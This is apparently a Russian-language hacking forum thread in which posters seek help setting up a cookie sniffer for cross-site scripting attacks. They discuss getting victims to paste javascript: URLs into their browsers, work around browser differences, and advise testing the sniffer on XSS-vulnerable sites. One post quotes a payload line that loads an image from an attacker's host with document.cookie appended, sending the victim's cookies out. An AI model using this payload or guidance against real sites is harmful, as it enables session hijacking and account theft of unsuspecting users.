У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил , помогите нубу разобраться плс.
мазахакер помоги со своим js.в общем самодостаточные скрипты снифают нормально,но работают в хроме.тут есть один минус.хром убирает надпись javascript в адресной строке(ну и конешно большой минус мало какой юзверь решится такое вставить себе в браузер и тем более что то то дописывать руками)в firefox самодостаточные вообще не выполняются(тупо никакой реакции).при выполнении скрипта происходит редирект на гугл но в логах ничего нет.тоже самое с картинкой
img = new Image(); img.src = "http://сайт/картинка.gif?"+document.cookie; хотя при выполнении самодостаточного все снифается.как переделать js так чтобы все работало и можно ли сделать скрипт который одинаково нормально будет работать и в ff и в chrome
У меня проблема со сниффером , я вроде бы уязвимость нашел , хостинг нашел , а вот как это все со сниффером "склеить" вообще невкурил , помогите нубу разобраться плс.
что склеить то?залей его на хост.зайди в лог и тестируй на сайтах где есть xss.хотя у меня получилось только с самодостаточными скриптами.и то тока в хроме